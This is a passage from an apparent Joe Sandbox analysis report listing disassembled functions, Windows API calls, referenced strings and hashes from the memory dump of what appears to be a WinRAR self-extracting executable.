                                                                                • Part of subcall function 00D2B41F: RemoveDirectoryW.KERNEL32(?,?,?,00000800,?,00D28649,?), ref: 00D2B45E
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$DirectoryRemove$CloseFind
                                                                              • String ID:
                                                                              • API String ID: 973666142-0
                                                                              • Opcode ID: 13c4833921830cc24cf7045191f17a435417e1473527d55b164f376317025a4e
                                                                              • Instruction ID: 5877ed1fcc6dbb2aa102a5da5df95564cac97046f37ddc193dd4bdda1ea43b3e
                                                                              • Opcode Fuzzy Hash: 13c4833921830cc24cf7045191f17a435417e1473527d55b164f376317025a4e
                                                                              • Instruction Fuzzy Hash: DC31C3718012789BCF21AF64AC41BEE3365EF64389F084496F849A7149EF74DEC5DAB0
                                                                              Function 00D4DB48 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00D4A871,?,00000000,?,00000001,?,?,00000001,00D4A871,?), ref: 00D4DB95
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D4DC1E
                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D480B1,?), ref: 00D4DC30
                                                                              • __freea.LIBCMT ref: 00D4DC39
                                                                                • Part of subcall function 00D4A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D4DBEC,00000000,?,00D480B1,?,00000008,?,00D4A871,?,?,?), ref: 00D4A830
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                              • String ID:
                                                                              • API String ID: 2652629310-0
                                                                              • Opcode ID: b3c9f1c73cab43cd3611fdd315fac5a11f045f9f4f8e469b455c9d065f049adc
                                                                              • Instruction ID: 5504ba84056e277bebe9cd4f2aedc6d23e4f84258699b5330e7650152aeafe98
                                                                              • Opcode Fuzzy Hash: b3c9f1c73cab43cd3611fdd315fac5a11f045f9f4f8e469b455c9d065f049adc
                                                                              • Instruction Fuzzy Hash: A531AD72A0020AABDF259F64DC81EAE7BB6EF44310B094269FC04D6250EB35DD90CBB0
                                                                              Function 00D3B673 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 00D3B676
                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D3B685
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D3B693
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00D3B6A1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDevice$Release
                                                                              • String ID:
                                                                              • API String ID: 1035833867-0
                                                                              • Opcode ID: 86367c2ff615a36522a4af3f661bbbbcc46bb44214d52df7f30c2d20050c5d4e
                                                                              • Instruction ID: 07323f9d2e4bbc9cef0a6197370eb463b4abf63670f79b99090f736113c3bdbb
                                                                              • Opcode Fuzzy Hash: 86367c2ff615a36522a4af3f661bbbbcc46bb44214d52df7f30c2d20050c5d4e
                                                                              • Instruction Fuzzy Hash: B0E0EC319A5B60ABD7601B64BC1EB9A3F94AB15712F080105F605EA394CAB054008FF1
                                                                              Function 00D3B81C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00D3B6A9: GetDC.USER32(00000000), ref: 00D3B6AD
                                                                                • Part of subcall function 00D3B6A9: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D3B6B8
                                                                                • Part of subcall function 00D3B6A9: ReleaseDC.USER32(00000000,00000000), ref: 00D3B6C3
                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00D3B84C
                                                                                • Part of subcall function 00D3BADE: GetDC.USER32(00000000), ref: 00D3BAE7
                                                                                • Part of subcall function 00D3BADE: GetObjectW.GDI32(?,00000018,?), ref: 00D3BB16
                                                                                • Part of subcall function 00D3BADE: ReleaseDC.USER32(00000000,?), ref: 00D3BBAE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectRelease$CapsDevice
                                                                              • String ID: (
                                                                              • API String ID: 1061551593-3887548279
                                                                              • Opcode ID: df4f8fab988898c0917136799890df598695087ae401a50a8a5ba9142fecda89
                                                                              • Instruction ID: eac5200d2c3f8bf86490ea9b973cbb9eda577c43dc5a5c66b56eca05a851b6af
                                                                              • Opcode Fuzzy Hash: df4f8fab988898c0917136799890df598695087ae401a50a8a5ba9142fecda89
                                                                              • Instruction Fuzzy Hash: 4991FE71608754AFD610DF25C848A2BBBE8FFC9715F00491EFA9AD3260DB70A845CF62
                                                                              Function 00D280BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00D280C3
                                                                                • Part of subcall function 00D31907: _wcslen.LIBCMT ref: 00D3190D
                                                                                • Part of subcall function 00D2B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D2B991
                                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D28262
                                                                                • Part of subcall function 00D2B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D2B5B5,?,?,?,00D2B405,?,00000001,00000000,?,?), ref: 00D2B8FA
                                                                                • Part of subcall function 00D2B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D2B5B5,?,?,?,00D2B405,?,00000001,00000000,?,?), ref: 00D2B92B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                              • String ID: :
                                                                              • API String ID: 3226429890-336475711
                                                                              • Opcode ID: a091ccea8d3c587cafc0822412c9115c6427e7d20935db7a40b91abe4b7a198a
                                                                              • Instruction ID: b22fc7e0076915fffb0a8d7bbaf78491ad98c826539498393e916bf609e9e0b4
                                                                              • Opcode Fuzzy Hash: a091ccea8d3c587cafc0822412c9115c6427e7d20935db7a40b91abe4b7a198a
                                                                              • Instruction Fuzzy Hash: 71518171800278AAEB25EB50DC56EEEB37CEF55308F044095F609A2082DB745F89DF71
                                                                              Function 00D3C67E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen
                                                                              • String ID: }
                                                                              • API String ID: 176396367-4239843852
                                                                              • Opcode ID: dfe942770a35e733e485d6364e680a5f42705ac77dfe535667b5079e5ef478a0
                                                                              • Instruction ID: 497adccc620dee2281654ed605e6540fa4263cef8ae93de1d4a1e6df5c3978aa
                                                                              • Opcode Fuzzy Hash: dfe942770a35e733e485d6364e680a5f42705ac77dfe535667b5079e5ef478a0
                                                                              • Instruction Fuzzy Hash: 512124B29283165BD731EB64D846B6BB3ECDF81790F08142AF940E3141EB61ED4C87B2
                                                                              Function 00D3069C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00D30627: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D30646
                                                                                • Part of subcall function 00D30627: GetProcAddress.KERNEL32(00D6A1F0,CryptUnprotectMemory), ref: 00D30656
                                                                              • GetCurrentProcessId.KERNEL32(?,00000200,?,00D30697), ref: 00D3072A
                                                                              Strings
                                                                              • CryptProtectMemory failed, xrefs: 00D306E1
                                                                              • CryptUnprotectMemory failed, xrefs: 00D30722
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$CurrentProcess
                                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                              • API String ID: 2190909847-396321323
                                                                              • Opcode ID: 2bc7a551dabf639db14e3b8ef0afb52a05529d775bb50d7067e33efa82326897
                                                                              • Instruction ID: 76c70a853becee9544c27ad23701efc442862a1143179f601ff7bb49a895c569
                                                                              • Opcode Fuzzy Hash: 2bc7a551dabf639db14e3b8ef0afb52a05529d775bb50d7067e33efa82326897
                                                                              • Instruction Fuzzy Hash: CD112671A00364ABDF115F24DC61A6E3F58EF40768F098115FC51AB391D774AD818EF6
                                                                              Function 00D2CDC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _swprintf.LIBCMT ref: 00D2CDE7
                                                                                • Part of subcall function 00D24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D24A33
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: __vswprintf_c_l_swprintf
                                                                              • String ID: %c:\
                                                                              • API String ID: 1543624204-3142399695
                                                                              • Opcode ID: 3a65a96d0b7416591cf3a583a8f36a2fda7637d1aba41fb34a271e5277586c9d
                                                                              • Instruction ID: 3ad1835a3fca2ce304f351f76e35a8b341b99e80016b4fcad2093e8dc32fe4c1
                                                                              • Opcode Fuzzy Hash: 3a65a96d0b7416591cf3a583a8f36a2fda7637d1aba41fb34a271e5277586c9d
                                                                              • Instruction Fuzzy Hash: B401F5635143217BDA307B69AC47D6FA7ACEFF5774B44541AF484D6082EA20DC54C2B1
                                                                              Function 00D3233E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateThread.KERNEL32(00000000,00010000,00D32480,?,00000000,00000000), ref: 00D32362
                                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 00D323A9
                                                                                • Part of subcall function 00D276E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D27707
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                              • String ID: CreateThread failed
                                                                              • API String ID: 2655393344-3849766595
                                                                              • Opcode ID: e94b8447a277cb96af7b38ddcf5a5665520a4cb1df96e41721dd22e39d1a9f5d
                                                                              • Instruction ID: 6bd2f075bac825ee7be02531358ae330fdb1acdb7dd3211ea9750c9be6eda046
                                                                              • Opcode Fuzzy Hash: e94b8447a277cb96af7b38ddcf5a5665520a4cb1df96e41721dd22e39d1a9f5d
                                                                              • Instruction Fuzzy Hash: AF01F9B57447027FD7206F58EC81F72B398EF54716F20012DFB86962C0CAF168448635
                                                                              Function 00D3F82F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VirtualQuery.KERNEL32(80000000,00D3F774,0000001C,00D3F969,00000000,?,?,?,?,?,?,?,00D3F774,00000004,00D83D24,00D3F9F9), ref: 00D3F840
                                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00D3F774,00000004,00D83D24,00D3F9F9), ref: 00D3F85B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: InfoQuerySystemVirtual
                                                                              • String ID: D
                                                                              • API String ID: 401686933-2746444292
                                                                              • Opcode ID: 4cdcd6d11a5db000fdf6cab645ad8a16a82facab2459c5c2c45bcad20400e358
                                                                              • Instruction ID: 86326dee2e63f903cf59fe8c376eb9a1355f6ead1beeba806522f5c6060acdcc
                                                                              • Opcode Fuzzy Hash: 4cdcd6d11a5db000fdf6cab645ad8a16a82facab2459c5c2c45bcad20400e358
                                                                              • Instruction Fuzzy Hash: 5901F772A002096BCB18DF29DC05BEE7BE9AFD4329F0CC234ED19D7254EA34D9418690
                                                                              Function 00D3EC9B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup, xrefs: 00D3ECB1, 00D3ECC8
                                                                              • Software\WinRAR SFX, xrefs: 00D3ECE5
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen
                                                                              • String ID: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup$Software\WinRAR SFX
                                                                              • API String ID: 176396367-3423262912
                                                                              • Opcode ID: c4d4a91220edb4b03e34bb3c131ec848c800894c8cc65d8327d7ab5e705eb19a
                                                                              • Instruction ID: 2107ad369abc657b903069df605541f89947111fd542355b2d34b4506540f585
                                                                              • Opcode Fuzzy Hash: c4d4a91220edb4b03e34bb3c131ec848c800894c8cc65d8327d7ab5e705eb19a
                                                                              • Instruction Fuzzy Hash: EA014475901218BAEB219B95EC09FDB7FACEF05791F004051B509E51A1E6B09A88DBF1
                                                                              Function 00D212F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00D2F608: _swprintf.LIBCMT ref: 00D2F62E
                                                                                • Part of subcall function 00D2F608: _strlen.LIBCMT ref: 00D2F64F
                                                                                • Part of subcall function 00D2F608: SetDlgItemTextW.USER32(?,00D60274,?), ref: 00D2F6AF
                                                                                • Part of subcall function 00D2F608: GetWindowRect.USER32(?,?), ref: 00D2F6E9
                                                                                • Part of subcall function 00D2F608: GetClientRect.USER32(?,?), ref: 00D2F6F5
                                                                              • GetDlgItem.USER32(00000000,00003021), ref: 00D2133A
                                                                              • SetWindowTextW.USER32(00000000,00D545F4), ref: 00D21350
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                              • String ID: 0
                                                                              • API String ID: 2622349952-4108050209
                                                                              • Opcode ID: d33fccba5aaf1d962f21d0d0f0afdd638348ef631b03393c0687a83b0fdaaa9c
                                                                              • Instruction ID: 3a6d28ca36c124f4c6252cb6366785ec73e0916688d648baaaf3821012ee6e25
                                                                              • Opcode Fuzzy Hash: d33fccba5aaf1d962f21d0d0f0afdd638348ef631b03393c0687a83b0fdaaa9c
                                                                              • Instruction Fuzzy Hash: 89F08C35104798ABDF158F60AC0DBA93BAABB3538DF088124FE44945A1DB75C994EB34
                                                                              Function 00D32303 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00D32526,?), ref: 00D32309
                                                                              • GetLastError.KERNEL32(?), ref: 00D32315
                                                                                • Part of subcall function 00D276E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D27707
                                                                              Strings
                                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00D3231E
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                              • API String ID: 1091760877-2248577382
                                                                              • Opcode ID: 23bdb8d5a1cbfcd13495e449036bf727e042a1a96886351fb13c1aac852f7510
                                                                              • Instruction ID: cf9f1e49da7e64aff717a0ef1e9556b8d09b959012500ccbe26809a5e0629ef8
                                                                              • Opcode Fuzzy Hash: 23bdb8d5a1cbfcd13495e449036bf727e042a1a96886351fb13c1aac852f7510
                                                                              • Instruction Fuzzy Hash: B7D02B3180C63037C611232C7C09D6F38049F31376F740704FA39912F0CB70099041B2
                                                                              Function 00D2F5BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00D2ED75,?), ref: 00D2F5C3
                                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00D2ED75,?), ref: 00D2F5D1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
